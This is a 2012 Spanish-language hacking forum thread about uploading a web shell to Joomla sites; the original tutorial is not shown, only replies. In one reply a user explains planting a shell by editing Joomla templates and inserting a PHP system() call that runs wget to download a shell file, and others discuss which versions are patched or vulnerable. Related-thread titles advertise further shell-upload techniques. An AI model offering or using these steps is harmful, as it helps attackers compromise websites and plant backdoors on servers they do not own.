send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Upload shell en Joomla

  • 10 Respuestas
  • 4008 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado duff10

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Mayo 19, 2012, 04:33:45 pm »
Buenas chicos soy: Duff eh estado en otros foros de informatica como en Diosdelared... les quiero compartir un tutorial que hice, espero les guste.. comenten



« Última modificación: Julio 27, 2015, 04:52:03 am por blackdrake »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5267
  • Actividad:
    48.33%
  • Reputación 26
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Mayo 19, 2012, 04:47:51 pm »
Que buen aporte Duff!!
Segui asi man!


Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email
« Respuesta #2 en: Mayo 19, 2012, 07:21:18 pm »
Buen aporte, me gusto mucho. Saludos!

Desconectado M1ndCr4ck

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
  • Lo único que no podrán quitarnos es la mente
    • Ver Perfil
    • ~M1ndCr4ck~
« Respuesta #3 en: Junio 01, 2012, 12:37:36 am »
que gran aporte de mucha ayuda.
salu2 duff  ;D

Desconectado عя ҜΔŁĬ

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Junio 27, 2012, 12:03:21 pm »
Gracais por el tutorial, ya probe de dos formas, editando las plantilas y poniendo un uploader, y tambien con este método, pero al momento de subir el archivo me tira este error:

Citar
Not Acceptable

An appropriate representation of the requested resource /administrator/index.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Qué podría hacer para solucionarlo? Saludos

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5267
  • Actividad:
    48.33%
  • Reputación 26
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #5 en: Junio 27, 2012, 12:05:41 pm »
Quizas la version que tenes instalada ya esta parcheada


Desconectado Cronos

  • *
  • Underc0der
  • Mensajes: 1000
  • Actividad:
    0%
  • Reputación 1
  • Mientras mas se, me doy cuenta de lo poco que se.
    • Ver Perfil
    • Email
  • Skype: cronos.labs
« Respuesta #6 en: Junio 27, 2012, 12:09:48 pm »
Si, yo instale Joomla y quise tratar de subir una shell por el Panel de Administracion como si fuera una imagen. Igual como dice el tutorial este, pero al tratar de modificar la seccion para agregar extenciones. Esta por lo que vi ya ha sido parcheada. Porlomenos en la version que probe que era la 2.5
Saludos,, Cronos.-

Desconectado عя ҜΔŁĬ

  • *
  • Underc0der
  • Mensajes: 21
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Junio 27, 2012, 12:26:30 pm »
Gracias por las respuestas, la versión que usa es la 1.5.22. Acabo de intentar meterle passthru en las plantillas, pero al poner index.php=cmd=uname -a no me tira nada, seguire probando haciendo inlude o algun consejo que me digáis...
Saludos

EDIT: ya subí la shell, para los que quieran saber cómo, van a editar plantillas, y meten el comando system: <?php system("wget http:\\shell.txt") ?>
El comando  passthru y exec estaba dessactivado en ese servidor, por eso tuve que usar system()
Saludos ;)
« Última modificación: Junio 28, 2012, 07:28:24 am por عя ҜΔŁĬ »

Desconectado Sanko

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    0%
  • Reputación 0
  • ¿Puedes?
    • Ver Perfil
    • Underc0de
« Respuesta #8 en: Junio 27, 2012, 03:23:03 pm »
You are not allowed to view links. Register or Login
Si, yo instale Joomla y quise tratar de subir una shell por el Panel de Administracion como si fuera una imagen. Igual como dice el tutorial este, pero al tratar de modificar la seccion para agregar extenciones. Esta por lo que vi ya ha sido parcheada. Porlomenos en la version que probe que era la 2.5
Saludos,, Cronos.-
La 2.5 tiene vulnerabilidad en el registro :You are not allowed to view links. Register or Login
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

Desconectado Dedalo

  • *
  • Underc0der
  • Mensajes: 115
  • Actividad:
    0%
  • Reputación 0
  • No Aprendas para Hackear, Hackea para Aprender.
    • Ver Perfil
    • SeguridadBlanca - Seguridad Informática Perú
« Respuesta #9 en: Junio 27, 2012, 08:18:46 pm »
Excelente post :) muy útil.


You are not allowed to view links. Register or Login


Saludos,
Dedalo
You are not allowed to view links. Register or Login

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 412
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #10 en: Junio 28, 2012, 12:07:19 am »
Buen Aporte, Nunca lo habia probado!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

 

¿Te gustó el post? COMPARTILO!



Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdoorizar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 2110
Último mensaje Julio 17, 2012, 12:35:31 am
por hdbreaker
Subir Shell a través de Inyección SSI (Server-side include)

Iniciado por CalebBucker

Respuestas: 7
Vistas: 3407
Último mensaje Junio 23, 2012, 08:44:07 am
por s3cur1tyr00t
Shell-Save_1.0 [Administra de manera mas eficiente tus webshells online]

Iniciado por q3rv0

Respuestas: 9
Vistas: 3531
Último mensaje Abril 14, 2013, 05:34:46 am
por s3cur1tyr00t
Subir Shell desde la Administración de un foro SMF

Iniciado por Rootscale

Respuestas: 3
Vistas: 3355
Último mensaje Agosto 07, 2015, 06:13:33 pm
por Decode
HTTP METHODS: Subiendo Shell mediante PUT

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2108
Último mensaje Febrero 24, 2010, 03:07:58 pm
por dracko.rx